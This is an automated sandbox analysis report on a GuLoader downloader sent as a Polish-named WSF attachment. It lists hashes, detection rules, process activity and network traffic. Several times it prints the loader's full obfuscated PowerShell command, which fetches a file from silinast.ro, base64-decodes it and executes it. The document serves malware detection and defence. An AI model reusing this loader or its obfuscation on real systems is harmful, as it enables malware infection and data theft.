Windows Analysis Report
Prosba o oferte.wsf

Overview

General Information

Sample name: Prosba o oferte.wsf
Analysis ID: 1528867
MD5: 28ce58ca6b41786b0bd031af45f91d89
SHA1: 7b72d8d9995bc61daf0074e967945ac6ed02a093
SHA256: 43f28bfd339504ab45e4a3f52f8172036e196ef40e03ffcf6d5626f87a93f0e1
Tags: wsf, user-Maciej8910871

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Scan Loop Network
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7312 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Prosba o oferte.wsf" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7340 cmdline: cmd.exe /c ping 6777.6777.6777.677e MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 7392 cmdline: ping 6777.6777.6777.677e MD5: 2F46799D79D22AC72C241EC0322B011D)
    • powershell.exe (PID: 7468 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. 
E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:DagbrknS rchiepEDampskic roniseuSidereaRPineryaIVrist utr publiyAppre,up D.emakRJaguaroOHestehatGenerelODoggylacBlou,ieOStrubehlU unsti Recreme=Middelh Iglerne[CheviotnMesologeberapnitSu dogc.Syr,pliS eleddeeSelvsikc Unex,rudownpourGeswarpIWorktimtPulic dyNonrecip,aandopR Limed,O ,bessiTCirkeleOP.oduktCPudsekaODromiciLForfristStencilY 
colossPButterpEUndercr]Salmary:Isa,xet:UnsuccuTKonditeLRishiseSDeplace1ma tful2 ridine ');$oversaettelser=$remiserne[0];$Polymorphosis=(Ridsning89 'Bar alo$Steens.G EpilogL CheckmOschellaBMiljan AAn sogel Dur ps:TelefonOAdvokatcOriginiCE,genesaAptianaSSamhrig= FelthrNSpleni eLinie,ewBehfter-JagtregoTantal b StrengJBara keEslidstrCComma,pTSu.rhom estoves AntimeY SaloonsDefilertAnt,chaeDobbeltMAfgifts. An.misnAfmaalieSkovsneTPa.fyld.Matten WQuotedrEdi tionBAdminisc acteriLMeltablIKarpetvePremonsN uperiotIon xal ');Ruttendes80 ($Polymorphosis);Ruttendes80 (Ridsning89 ' Sjleg.$UrinemiO SalgspcPoternec teniniagrovelisRedunda.Polic.hHRandruseo ationaKova endBreathfeSomret r bygg,lsvidende[Sikkerh$udse deeWarti en PhasmaeLngdespr Non ere yetstr]dolmere=Afsonin$SeriefrN TemanuoSj krinnmodta edSorbedsi ActionfCommutefho rorouNi kroksIntestaiAleiptebSporvoglPaladineKarakte ');$Jobskabelsesordninger=Ridsning89 ' Thalam$UnameliOTekstmncBedrevncCrochetaLibatins Bleph .FlertalDHelvedeoFiredrawTumulosnAlkars l ForeigofilicinaForstasd CrimelFcostoc,iMickla lPara heeAlmi de(Isogen $UnderekoAllerstv RelubreStopklor KeelmasStone raSpidsbueGran patQua,rint Nat raelaceratlRegenersH nfreleSko emorProc am,Embed.m$P anineSDafniercSnuses oPandekat,ipakvatAffjed i N vnef) Bu ble ';$Scotti=$Arenig;Ruttendes80 (Ridsning89 'Bedst v$ GrundvgPunkerwlv lutaro PharynbResolveAHighfalLPrecom.:GoaleeaMAdlayflECharrosSHelmi,tO Ra.bitCStabensaTilbehrr RedimeD Gethesi O formUtchaderMSepiaer= Ast ol(AstrochtSjuskemeTommeskSFronts,tInertia-DruggerpSmaakraA PentasTPseudochembedsf Pingpon$kuldsejsRegalebCKolportOTordenkTPopularTNebengei Vergeh),predtl ');while (!$Mesocardium) {Ruttendes80 (Ridsning89 'Cambric$GalantegU roduklIulid no MorakkbSkjaldeaBugginglTrochle:PirnedkC Corr.laPrelimilcontekev FilmfeaElektrodSheenieoSammenssUnsoci eEmbedmer Arbejd=Tro aer$BlypeistStribedrdepreciu AntiloeBirdymu ') ;Ruttendes80 $Jobskabelsesordninger;Ruttendes80 (Ridsning89 ' ProcessNrsy etTTran meA Mo regr 
almiakTNeu,osu-Pa apsysUorga iLVom srueIn.ylice TenorsPCracksk Ebionit4 Py tru ');Ruttendes80 (Ridsning89 ' anhan$ressourgHovedvelDemogoroFamilieBMohammeAS.yringlKonkurs:TarmacmMHyperpiEObloquiS SolsikoFugtig cTornensaReloaneRContribDPo tanviDemograuQueniteMIndilat=rdskres(Tungekat.hanneleLunelseSEchino,tunm sse-StreungP,reddesA Sol tiTGatfinnHescapes Rsonnre$ netkorsTjanserCmisa.phOKasikumTUntuneatMiljoe iImp.ctf)Tiltruk ') ;Ruttendes80 (Ridsning89 'Faareky$ Span ggKom.eteL GrevinoUnder tBM sterkAHexactdLBasunki:Svale,rrProat eSPseudomt synk.o=Vrngend$HypothegCelado LG ecingOGrovderb Fr.gtfAPandoorlArbej.s:S ejlmohCurliewO EnolizvVankelmE Sa dviDRegulatsMeritleTreadornDAcetateE.rmorinRAppr xinLangtfreVoldgif+ Theopn+Bl,nder%B erska$Hjer,evrPopsieseBr sekam Emi,teI aldernsTio ontEkagedejRC.tronsnIntertreAmbitio. remkalCTopiadeoNdlsninURevengenKraitsgtPhoma e ') ;$oversaettelser=$remiserne[$Rst];}$Tttedes=326639;$saltene=34997;Ruttendes80 (Ridsning89 ' Readab$ mediefGSkonn.rLOmvurdeOVejrforbSoudanoaIscenesLSmu dre:Addit rgPeripr aT yrocoLArchpriGHomoaniaBuggysblRhi oth2Udvande1Doltish2Danaide Argesta= uanaju BoligakGMingledePecksbrTForthca- agstagCDirektoo HurtignInnobedTKrig skEBeneficnAdopt.vTAgrosto Grssers$MorfinrsstatsobcFrem igoDronte T,anonesT SkydeliAfkogen ');Ruttendes80 (Ridsning89 'oejentr$Til.varg EnhalolLangesso S oldibPedun uaDdse,stlPinlige:BlddeleSAdopt,vkPre ispr AnglicmMnemotekCr zadooI,putterGanespat Dollfie So emitH potrasDertilh Pre.ect=Gudfryg Nyans t[PanorerS,ildoesy diculesS lstictStatio eHomeoidmNyttepl.Hov.dmnCStepninoOrganisnKrrers,vUrbicole GlandurDynamogtUmuligg]venc.es: Apo.op:Stu.gerFBrode irNonk nfo,rosciemRescuerBAmati oa aveates Immunoe Grever6Appeten4UndergiSBldtes.t ungramrma tynii Omkar.nBydren gIndsben(grazess$SygejouGDisacc aAfhngiglFolkebigBen alsaKartof lGardebr2Vilif e1Pseudob2Ratifik) Unretr ');Ruttendes80 (Ridsning89 'Sk ated$Musophag Fu ktiLF itageoUnshameb SyllabaPre 
bytLKlangen:preoccupVinduesR.oodleaOTantaluJRefereneK,stterk ArchemTsupermomMarlberAKaramboGBumbasseBusmanfrSideganE Hypo iN.lhoppe Sharif=Olmintr Cateri [LaanernSS.ingomYA ticapsHolosyst Civil EW enersMNaphtha.Coked fTDis.quiE Temp,rxSymptomT Demihe.Phello ECymosebn EmulsiCUdvikliOLethargDProvan ICo.loqunBi.liotG Frilag]Overmod: Ov.rho:TrstespANo icess B.ggemCRudime,iDiauli,i Arbejd.ConnectgbibliogeSwitcheT CephalstrykknaTT levierS gganpI BebyrdnTrsterngSugem,k( Thia e$Stra leSScheelikGravsknR drulnmDobbeltkOenomanoTumu.usR Som.dato dkritE PengestP.raconsordstrr)Garring ');Ruttendes80 (Ridsning89 'Kultu.e$SovjetrGFlys.yrlChauvinOO.ertrdbSludderA HanderLRoadrun: For ulf CamelkURn eboenC.maenvN KakerleChemehuLudsvednFScru.uloOpsttecRFemma tML gerva= Bystat$ ndiscpS,ruktuRDataselOVibrahaJHyperdoE GyritsK Bagkl tTrk uglMBan eorA ThemedgH spitaeG ksporRFremtidEMajonseNDomsafs.demetonS Ded.cnU Peake bKons rusun.erviTKaritt R illedIBage,psNprecisigVirksom(Skaberi$AfstrafTUrb nisTAdanfejTConominEScar dldPalu amE Un bsts trafi , Michel$UdstansS elotaAPrgt gel DolomitEjeresuE Eftergn HalvtieNonreti)Udbring ');Ruttendes80 $Funnelform;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7936 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" [same obfuscated script argument as PID 7468 above] MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
00000009.00000002.4239463001.0000000008370000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000009.00000002.4239592864.00000000095B5000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
00000009.00000002.4228266092.00000000055C6000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
Process Memory Space: powershell.exe PID: 7468 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

Source | Rule | Description | Author | Strings
amsi64_7468.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi64_7468.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
              • 0x10541:$b2: ::FromBase64String(
              • 0xd8f4:$s1: -join
              • 0x70a0:$s4: +=
              • 0x7162:$s4: +=
              • 0xb389:$s4: +=
              • 0xd4a6:$s4: +=
              • 0xd790:$s4: +=
              • 0xd8d6:$s4: +=
              • 0xfc5f:$s4: +=
              • 0xfcdf:$s4: +=
              • 0xfda5:$s4: +=
              • 0xfe25:$s4: +=
              • 0xfffb:$s4: +=
              • 0x1007f:$s4: +=
              • 0xe100:$e4: Get-WmiObject
              • 0xe2ef:$e4: Get-Process
              • 0xe347:$e4: Start-Process
amsi32_7936.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
              • 0xb0ee:$b2: ::FromBase64String(
              • 0xa18c:$s1: -join
              • 0x3938:$s4: +=
              • 0x39fa:$s4: +=
              • 0x7c21:$s4: +=
              • 0x9d3e:$s4: +=
              • 0xa028:$s4: +=
              • 0xa16e:$s4: +=
              • 0x15359:$s4: +=
              • 0x153d9:$s4: +=
              • 0x1549f:$s4: +=
              • 0x1551f:$s4: +=
              • 0x156f5:$s4: +=
              • 0x15779:$s4: +=
              • 0xa998:$e4: Get-WmiObject
              • 0xab87:$e4: Get-Process
              • 0xabdf:$e4: Start-Process
              • 0x1600a:$e4: Get-Process

              System Summary

              Source: Process started, Author: frack113, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated script argument, as in the process tree entry for PID 7468 above]
              Source: Process started, Author: Michael Haag, Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Prosba o oferte.wsf", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Prosba o oferte.wsf", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Prosba o oferte.wsf", ProcessId: 7312, ProcessName: wscript.exe
              Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated script argument, as in the process tree entry for PID 7468 above]
              No Suricata rule has matched

              AV Detection

              Source: silinast.ro, Virustotal: Detection: 10%
              Source: http://silinast.ro, Virustotal: Detection: 10%
              Source: http://silinast.ro/Kommunikuternes.inf, Virustotal: Detection: 9%
              Source: Prosba o oferte.wsf, Virustotal: Detection: 8%
              Source: Prosba o oferte.wsf, ReversingLabs: Detection: 13%
              Source: Submitted Sample, Integrated Neural Analysis Model: Matched 98.7% probability
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.2138100600.000002CC9D367000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ion.pdb source: powershell.exe, 00000004.00000002.2136856117.000002CC9D1CD000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677e
              Source: global traffic, HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1 Host: silinast.ro Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: silinast.roConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: 6777.6777.6777.677e
              Source: global trafficDNS traffic detected: DNS query: silinast.ro

              System Summary

              Source: amsi64_7468.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_7936.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7468, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7936, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677e
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. 
E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:Dagbr
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
              Source: Prosba o oferte.wsfInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8354
              Source: unknownProcess created: Commandline size = 8354
              Source: amsi64_7468.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_7936.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7468, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7936, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winWSF@11/7@2/1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Selvsikkerhedens.Pan
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7944:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1jpe3iyr.xo4.ps1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7468
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7936
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Prosba o oferte.wsf"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. 
E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N 